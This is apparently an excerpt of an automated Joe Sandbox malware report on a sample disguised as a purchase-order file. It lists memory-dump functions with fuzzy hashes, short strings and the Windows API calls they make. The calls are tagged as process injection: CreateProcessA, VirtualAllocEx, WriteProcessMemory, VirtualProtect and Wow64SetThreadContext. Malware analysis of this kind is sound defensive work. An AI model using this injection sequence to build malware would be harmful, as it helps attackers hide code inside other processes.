Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: feddbf240de1690fd3ef47aa33bba9cc0b2bef1c699186ae79cba228414cfcad
Instruction ID: adec9d5e384ac7c0dd67c0ba4098241352035dc30f4eb46e03b8977e28055284
Opcode Fuzzy Hash: feddbf240de1690fd3ef47aa33bba9cc0b2bef1c699186ae79cba228414cfcad
Instruction Fuzzy Hash: 79521975A002288FDB64CF69C991BDDBBF6BF88300F5540D9E909A7351DA30AE81CF65

Function 05CAF6A8 Relevance: 1.8, Strings: 1, Instructions: 592COMMON

Download Yara Rule

Strings

(q, xrefs: 05CAFC88

Memory Dump Source

Source File: 00000000.00000002.1316660370.0000000005C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c90000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: b7b8ebc4f956da1c0a5b3b9e3d82bedaa0755de7a2ec6db71701937a941b0be0
Instruction ID: 06d361d5a3d4ab066a2a4955f7da029f4bad0ae665e534980d5cec8ec999a9ba
Opcode Fuzzy Hash: b7b8ebc4f956da1c0a5b3b9e3d82bedaa0755de7a2ec6db71701937a941b0be0
Instruction Fuzzy Hash: 7E22FF36B047019FCB25CF68D454A6EBFF2BF89304F18896DE49A87291DB34E942CB45

Function 05B13310 Relevance: 1.8, Strings: 1, Instructions: 535COMMON

Download Yara Rule

Strings

(_q, xrefs: 05B135AD

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (_q
API String ID: 0-3590916094
Opcode ID: ae7c41b91f6272163dc263e73f0ab938bd23b855c84909490f3c8d429bc68cc5
Instruction ID: 676395239c816184c4ee16dee24b2980629201f19f948bdaf236304878e845b7
Opcode Fuzzy Hash: ae7c41b91f6272163dc263e73f0ab938bd23b855c84909490f3c8d429bc68cc5
Instruction Fuzzy Hash: 2E229C35A002049FCB44CF98D495AADBBF6FF88310F5484A9ED06AB3A5DB35ED41CB94

Function 05AFD76C Relevance: 1.8, APIs: 1, Instructions: 281processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05AFD9DF

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 33fa6559087cf414acaa2c48d98ea0d6034d33eaddd81ad6dc46ce3f1b72e05a
Instruction ID: e1f79239a895225e5ec734a28b341339fd5377eafaa7d8dfee36fc7d77699678
Opcode Fuzzy Hash: 33fa6559087cf414acaa2c48d98ea0d6034d33eaddd81ad6dc46ce3f1b72e05a
Instruction Fuzzy Hash: 28B16471D04318CFDB21DFA9D885BEDBBB1BF09300F149169E869A7280DB348985CF95

Function 05AFD778 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 05AFD9DF

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 05dddd7ddfec21cbbcb6688e86362bf2b14ee0f1ef2fdc7dc36e4619021d8b54
Instruction ID: cde516154d7ddb3ab5126fd04ebd55fc0af397e272e2c8b3d029a1f688855566
Opcode Fuzzy Hash: 05dddd7ddfec21cbbcb6688e86362bf2b14ee0f1ef2fdc7dc36e4619021d8b54
Instruction Fuzzy Hash: E1A11E71D04218CFDB21DFA9D885BEEBBF1BB09300F149169E869A7280DB748985CF95

Function 05AFE1EB Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05AFE2C3

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e446dacc6c3496c4646742f2aa113d1b35009f55ae5914ca273dd1254c06a562
Instruction ID: b71c97973e5e329a4d96d2b5bf760171f621bddf3b42c192dec714001330b8d9
Opcode Fuzzy Hash: e446dacc6c3496c4646742f2aa113d1b35009f55ae5914ca273dd1254c06a562
Instruction Fuzzy Hash: A541B9B5D012589FCF10CFA9D984ADEFBF1BB49310F14902AE918B7250D739AA45CF64

Function 05AFE1F0 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 05AFE2C3

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 246af34c02ea8fa6f23b4970cf46f8155ecd20032bf379900678868591e2133f
Instruction ID: ff9ae5dee97f1922e592f805d8741e6fd8894474206e5d121571c4e3b9d98cf8
Opcode Fuzzy Hash: 246af34c02ea8fa6f23b4970cf46f8155ecd20032bf379900678868591e2133f
Instruction Fuzzy Hash: 7E41CAB4D012589FCF10CFA9D984ADEFBF1BB49310F10902AE818B7250D739AA45CF64

Function 05AFE088 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05AFE13A

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a1bcd82deb98544fb92fdece54340457e52f9b14dbc4099b4a5f10a3333f438c
Instruction ID: fdd0c192aeb1a6dba1104e9bda2fe859867950a8df9bbc4788b26fbf077a56cc
Opcode Fuzzy Hash: a1bcd82deb98544fb92fdece54340457e52f9b14dbc4099b4a5f10a3333f438c
Instruction Fuzzy Hash: 293198B8D042589FCF10CFA9D880A9EFBB1FB09310F10902AE915BB350D735A946CF58

Function 05AFE090 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05AFE13A

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b63ddca38825ed62aaf22948a7657af268b14df7a8c3084264c942b5b7d76f08
Instruction ID: 559ed4fc77e767a294868978c2a16ff95b70cb02f56d427b231487f92a910024
Opcode Fuzzy Hash: b63ddca38825ed62aaf22948a7657af268b14df7a8c3084264c942b5b7d76f08
Instruction Fuzzy Hash: DA3189B8D002589FCF10CFAAD980A9EFBB5BB59310F10942AE915B7310D735A946CF58

Function 057D0411 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 057D04BC

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b543e5af7f12f5c04700b6219e6e0b87b0f28cfc900bad671026357b2f10dfcc
Instruction ID: 1034bc219e44a92880a97b187b6b4b1c800f57f5bfce9b87cc2286bf799151a5
Opcode Fuzzy Hash: b543e5af7f12f5c04700b6219e6e0b87b0f28cfc900bad671026357b2f10dfcc
Instruction Fuzzy Hash: 8A31A8B9D012089FCF14CFAAD984ADEFBB1BB49310F14942AE815B7210D735A945CF68

Function 05AFE6D9 Relevance: 1.6, APIs: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AFE784

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d30aaf18be703c3eadd334bcfa9bdcc1b36f4e580e30c4f0eb610549b04636d6
Instruction ID: 6b55cce3157b2c65e5d0d7c0ed4d5e19ae5847ac0cad15041026d347e1a032c6
Opcode Fuzzy Hash: d30aaf18be703c3eadd334bcfa9bdcc1b36f4e580e30c4f0eb610549b04636d6
Instruction Fuzzy Hash: D331CAB8D052589FCF10CFAAE985AEEFBB1BB09310F14942AE815B7250C735A945CF54

Function 05AFE6E0 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 05AFE784

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f61e0d73738b54dff624af014962ebb668598376f9015014b8020bb1cd2dc443
Instruction ID: a5810add80d57a8c7b7be0a48a3e08919011220daf6683eb5c4ab9243dbc0ecf
Opcode Fuzzy Hash: f61e0d73738b54dff624af014962ebb668598376f9015014b8020bb1cd2dc443
Instruction Fuzzy Hash: B231C8B8D012589FCF10CFAAD880AEEFBB1BB09310F14902AE815B7210C735A945CF58

Function 057D0418 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 057D04BC

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3d0d66e4a89ecb2a5f31b50dc7432676298457fe6fb677ff7ebc58b516ce4343
Instruction ID: 76b13e23ce4b746097a834668755c1a1d9dcbc224abe77c50012c60dc7bb16e9
Opcode Fuzzy Hash: 3d0d66e4a89ecb2a5f31b50dc7432676298457fe6fb677ff7ebc58b516ce4343
Instruction Fuzzy Hash: 773199B4D012489FCF14CFAAD984ADEFBB1BB49310F14942AE815B7210D735A945CF64

Function 05AFDB28 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05AFDBDF

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1b857917f35293a16c32193a1bc278efc8e1e3a80da6b3549f30604f2659826d
Instruction ID: d7087b683cda15b36664ecd765d4682012e97ce64c67acb11c4a5b63681925ce
Opcode Fuzzy Hash: 1b857917f35293a16c32193a1bc278efc8e1e3a80da6b3549f30604f2659826d
Instruction Fuzzy Hash: B841DBB4D012589FDB10CFAAD884AEEFBF1BB48310F24802AE419B7240C7789946CF94

Function 05AFDB30 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 05AFDBDF

Memory Dump Source

Source File: 00000000.00000002.1316139543.0000000005AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5af0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d31fc5a1808d64e2c86582a73f64833e928abcd55359a598034bd58d43c00089
Instruction ID: 91e24685d2f69778aefa88195993bd875fc310d11efd2eb833953118ca253120
Opcode Fuzzy Hash: d31fc5a1808d64e2c86582a73f64833e928abcd55359a598034bd58d43c00089
Instruction Fuzzy Hash: 8831CBB5D012589FDB14DFAAD884AEEFBF1BF48310F24802AE415B7240C738A945CF54

Function 05B18DB3 Relevance: 1.5, Strings: 1, Instructions: 283COMMON

Download Yara Rule

Strings

,q, xrefs: 05B1913B

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: e0b1b94979a8f0bd3012b2ec77846bb398be915aff90ce29ebc86b72286fe521
Instruction ID: d06d99c4bef15e5bf6c2fd7ee668f15ceb2541bab5ff9753f8c41618aefe2319
Opcode Fuzzy Hash: e0b1b94979a8f0bd3012b2ec77846bb398be915aff90ce29ebc86b72286fe521
Instruction Fuzzy Hash: A6C14075A002288FDB54CB68C955BDDBBF6FF88700F1580D9E909AB351DA30AD81CFA5

Function 05B1CA50 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

(q, xrefs: 05B1CD04

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: a7bf90ad7006d4e694dac183936e113afc41db13bd9b82fa6042bb3d23800260
Instruction ID: d60160512941fe03c01b229775eeafcc15fe5d9522447fb2484f857389c2e9be
Opcode Fuzzy Hash: a7bf90ad7006d4e694dac183936e113afc41db13bd9b82fa6042bb3d23800260
Instruction Fuzzy Hash: 25A1AE317042009FD71A9F68D855F2A7FB2FF89310F5484A9E9068B3A1CB32EC02DB84

Function 00D24F4C Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

PHq, xrefs: 00D25393

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 36aeb26831353de2d3950efde85e926fa1992b1f39d258a524f8dd17b526ed63
Instruction ID: db5559e39921a93ec670a930c80ade2f7676edee71875a2d71fcc2c2491122f3
Opcode Fuzzy Hash: 36aeb26831353de2d3950efde85e926fa1992b1f39d258a524f8dd17b526ed63
Instruction Fuzzy Hash: 71D1C574D01228CFEB64CF64E988B99BBB1BF98309F2095E6D40DA2244DB705EC4DF61

Function 05B17ED1 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

4'q, xrefs: 05B180FA

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: 0c6bc1997210612b8c6f00ec7f4b382309b01e149be79f6516a09b4a3275ad0d
Instruction ID: 5d088061a8e87a31acf45b36b60ba5178d7d0f96bf74913be174238a0ff04037
Opcode Fuzzy Hash: 0c6bc1997210612b8c6f00ec7f4b382309b01e149be79f6516a09b4a3275ad0d
Instruction Fuzzy Hash: A6A1E834A10218DFCB44DFA4D899A9DBBB6FF89300F558159E806AB365DF70BC46CB84

Function 05B000D3 Relevance: 1.4, Strings: 1, Instructions: 198COMMON

Download Yara Rule

Strings

\&, xrefs: 05B000FB

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: \&
API String ID: 0-3884189056
Opcode ID: 72da2ea0dcf8386a0bb976793ba2061a02d960c2792937768e42ae965f829673
Instruction ID: 08c75e2c0375d632ae5845246e3be5269852d5320517ef82f7dcb42b0f4ecdc0
Opcode Fuzzy Hash: 72da2ea0dcf8386a0bb976793ba2061a02d960c2792937768e42ae965f829673
Instruction Fuzzy Hash: 33912C74D0525CCFDB14DFA4E954BACBBF2FB49301F5490A9E40AAB295CB346A89CF10

Function 0584F660 Relevance: 1.4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

Strings

,q, xrefs: 0584F6C3

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: ,q
API String ID: 0-196045463
Opcode ID: 04c1f899fd01f8719cd168229a5d15ed2bc96f55faf384957e6d2a53ed0a5535
Instruction ID: 6f557851957c32965743e37641da86882bb8845626215da5ba79d204b2e3c8ac
Opcode Fuzzy Hash: 04c1f899fd01f8719cd168229a5d15ed2bc96f55faf384957e6d2a53ed0a5535
Instruction Fuzzy Hash: A7518E357002149FCB14DF69D894A6EBBE6FF89311B218169EA05DF361CB31ED02CB91

Function 0584D7D0 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

pq, xrefs: 0584D880

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: pq
API String ID: 0-153521182
Opcode ID: 0576cbb970631a2039c23dca048fd086ca2d4ddc9a64246cd929d8ee51b8723a
Instruction ID: 1caf35940f50aa5b56953212f74ca9998359bb9490991af12d3a0d797388eb4e
Opcode Fuzzy Hash: 0576cbb970631a2039c23dca048fd086ca2d4ddc9a64246cd929d8ee51b8723a
Instruction Fuzzy Hash: 6A516076600104AFCB459FA8D905D29BBB3FF8D31471980E8E6098B372DB36DC22EB51

Function 0584E788 Relevance: 1.4, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

(q, xrefs: 0584E7FC

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: bbb5b4dc2fc382fa29f6107631e89a9fdd53ae73bdcb5267ae58d16e590f8bea
Instruction ID: 8ac51269260108a1c90958beb41e602d2cc0513ae04daf5f8639154ad546a75a
Opcode Fuzzy Hash: bbb5b4dc2fc382fa29f6107631e89a9fdd53ae73bdcb5267ae58d16e590f8bea
Instruction Fuzzy Hash: A251D031A0021A8FDB10DF68D480A6AF7B6FF85320B1586A5ED15EB241D730FC52CBD5

Function 05B1BB77 Relevance: 1.4, Strings: 1, Instructions: 134COMMON

Download Yara Rule

Strings

4'q, xrefs: 05B1BBC2

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: e49077de606b00449be9e1209f4289e488772ee199e3f2158a24379e546f0c16
Instruction ID: 0eb806e5f061ad73d6f9264402934a103dc978f4c5dfe696f53818a87b040e19
Opcode Fuzzy Hash: e49077de606b00449be9e1209f4289e488772ee199e3f2158a24379e546f0c16
Instruction Fuzzy Hash: 62417234B106148FCB44EB68D468A6E77B6FFC9700F504469E903AB3A4CF74AD068B95

Function 057D15D8 Relevance: 1.3, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 057D167F

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: cb0e1bc1c80c59cff199ea3a03150c948ddea44ab43ff541190412fb72bac5d7
Instruction ID: 9a1c8c798715bd1da47c7f952a27af2180ef70c33b98329937c43da3dd2f9d54
Opcode Fuzzy Hash: cb0e1bc1c80c59cff199ea3a03150c948ddea44ab43ff541190412fb72bac5d7
Instruction Fuzzy Hash: EA31A9B8D012489FCF14CFA9D880A9EFBF1BF49310F14942AE814B7210CB35A945CF94

Function 0584E078 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

(q, xrefs: 0584E0C8

Memory Dump Source

Source File: 00000000.00000002.1315256889.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 25b45d27c7d1f828e34778375a6f9d6f1aa54cbddd9ef26b11fc7149e97b4993
Instruction ID: 1c984e77fc750eedf2cfa5271ab19cf53c570afa8d9c655250b3e45d1a5b9d88
Opcode Fuzzy Hash: 25b45d27c7d1f828e34778375a6f9d6f1aa54cbddd9ef26b11fc7149e97b4993
Instruction Fuzzy Hash: 072106367043155FDB189F69E840A6E7B6AFBC9320B108139FE09CB350CF318C128B94

Function 057D15E0 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 057D167F

Memory Dump Source

Source File: 00000000.00000002.1315013204.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_57d0000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6b7264050e3f3b4a0eddd052d5306168af97c2988f9a263305f84a1860369af8
Instruction ID: 91fdb819b6eaf1744a3cf72cbcdc42bbba1dcf3f74b1acad71cb91646527feda
Opcode Fuzzy Hash: 6b7264050e3f3b4a0eddd052d5306168af97c2988f9a263305f84a1860369af8
Instruction Fuzzy Hash: 2F31A8B8D012489FCF14CFA9D880A9EFBB1BF49310F14942AE815B7210DB35A945CFA8

Function 05B17358 Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

4'q, xrefs: 05B173A1

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: 4'q
API String ID: 0-1807707664
Opcode ID: e185c486daabdbd77b0dc70dd1b14a945266b4b00a4ec14a723d7859dd789ded
Instruction ID: 0dcd29ad93bed19dbb88800980882df71171a5dea8a6d0bebef68d4a68494906
Opcode Fuzzy Hash: e185c486daabdbd77b0dc70dd1b14a945266b4b00a4ec14a723d7859dd789ded
Instruction Fuzzy Hash: 9621CE36B002009FCF048FA4D994E59BFB6FF88310B1544A9EE0A9B361DE31EC12CB95

Function 05B1267B Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

p<q, xrefs: 05B126BA

Memory Dump Source

Source File: 00000000.00000002.1316241056.0000000005B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b10000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: p<q
API String ID: 0-3896934649
Opcode ID: 6b0bb632b456b16a50496c0c276b4efb1cc2617e31159b72368c7feba1fbd716
Instruction ID: d032052239b64e6a8e15e2a7552e3955ad5576650b78e8273728780356dff6f3
Opcode Fuzzy Hash: 6b0bb632b456b16a50496c0c276b4efb1cc2617e31159b72368c7feba1fbd716
Instruction Fuzzy Hash: 91216D343042549FDB05DF6AD850AAABBEAFF8D340B484095FC45CB3A0DA31EC50CB60

Function 00D27F7F Relevance: 1.3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

Strings

t, xrefs: 00D2C45F

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: t
API String ID: 0-2238339752
Opcode ID: cf8c4024900be0b5b183dab5db1fb6ad6472bfd383925602367d9c9883dc8f39
Instruction ID: a38fa600ea41834b22fd86f6bbc3790a5f6192665be4afeafd8bfb9dbe049f2e
Opcode Fuzzy Hash: cf8c4024900be0b5b183dab5db1fb6ad6472bfd383925602367d9c9883dc8f39
Instruction Fuzzy Hash: 29310874905269CFDB24CF14D944BEDB7B1BB99304F1085E6D44DA2210DB709EC5DF51

Function 05B0AA9D Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

:, xrefs: 05B0B971

Memory Dump Source

Source File: 00000000.00000002.1316192633.0000000005B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5b00000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: 1819f852f8bb2a09e1c5c0ceb9696608347f736e5b619b27fd320ce6043af362
Instruction ID: 4199a771307f06c82e4f929d3b4103e38f5468580caa6f0b8cb8ce5ced9eb2f4
Opcode Fuzzy Hash: 1819f852f8bb2a09e1c5c0ceb9696608347f736e5b619b27fd320ce6043af362
Instruction Fuzzy Hash: FC317D74A50229CFDB64DF64C884BA9BBF2BB48300F0495E9D449A3291D731AE85DF50

Function 00D209E4 Relevance: 1.3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

Strings

Teq, xrefs: 00D20A23

Memory Dump Source

Source File: 00000000.00000002.1290469285.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d20000_PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
